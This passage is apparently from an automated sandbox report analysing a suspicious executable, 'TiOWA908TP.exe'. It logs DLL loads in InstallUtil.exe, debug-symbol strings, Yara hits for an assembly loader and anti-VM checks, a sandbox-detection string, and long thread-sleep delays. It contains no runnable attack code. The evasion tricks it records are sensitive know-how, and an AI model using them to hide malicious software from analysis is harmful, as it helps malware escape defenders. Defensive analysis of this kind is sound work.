                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: TiOWA908TP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: TiOWA908TP.exeStatic file information: File size 104857600 > 1048576
                Source: TiOWA908TP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbK source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb| source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TiOWA908TP.exe, 00000000.00000002.2478894252.0000000005970000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004281000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ((.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: osymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TiOWA908TP.exe, 00000000.00000002.2478894252.0000000005970000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004281000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbp{| source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbd source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb{ source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: b\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb\a%%A source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb4 source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbP source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb> source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb, source: InstallUtil.exe, 00000003.00000002.3443711385.0000000004E10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb: source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb; source: InstallUtil.exe, 00000003.00000002.3439891056.00000000007EA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb`z source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbXP| source: InstallUtil.exe, 00000003.00000002.3439572757.00000000006F8000.00000004.00000010.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.2.TiOWA908TP.exe.6fd0000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TiOWA908TP.exe.6fd0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2482629176.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TiOWA908TP.exe PID: 4456, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6660, type: MEMORYSTR
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CD5368 push eax; retf 0006h0_2_06CD5369
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF54EF push ebp; iretd 0_2_06CF5606
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF16FF push ss; iretd 0_2_06CF16FE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF0E88 push cs; iretd 0_2_06CF0ED6
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF6088 pushad ; iretd 0_2_06CF60D6
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF1E48 push ds; iretd 0_2_06CF1EFE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5440 push esp; iretd 0_2_06CF54EE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5257 push ebx; iretd 0_2_06CF5316
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF1650 push ss; iretd 0_2_06CF16FE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5268 push ebx; iretd 0_2_06CF5316
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5667 push edi; iretd 0_2_06CF5726
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5678 push edi; iretd 0_2_06CF5726
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF0E77 push cs; iretd 0_2_06CF0ED6
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF6077 pushad ; iretd 0_2_06CF60D6
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF542F push esp; iretd 0_2_06CF54EE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF163F push ss; iretd 0_2_06CF163E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF163F push ss; iretd 0_2_06CF16FE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF1E37 push ds; iretd 0_2_06CF1EFE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF1588 push ss; iretd 0_2_06CF163E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5388 push ebx; iretd 0_2_06CF53D6
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5187 push ecx; iretd 0_2_06CF51F6
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5787 push edi; iretd 0_2_06CF57EE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF1D80 push ds; iretd 0_2_06CF1E36
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5798 push edi; iretd 0_2_06CF57EE
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5F90 pushad ; iretd 0_2_06CF600E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF51A8 push ecx; iretd 0_2_06CF51F6
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF0D58 push cs; iretd 0_2_06CF0E0E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF0D52 push cs; iretd 0_2_06CF0E0E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF1D7F push ds; iretd 0_2_06CF1E36
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF5F7F pushad ; iretd 0_2_06CF600E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CF1577 push ss; iretd 0_2_06CF163E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: TiOWA908TP.exe PID: 4456, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: TiOWA908TP.exe, 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeWindow / User API: threadDelayed 775Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeWindow / User API: threadDelayed 4497Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 1360Thread sleep count: 775 > 30Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 1360Thread sleep count: 4497 > 30Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99295s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99143s >= -30000sJump to behavior
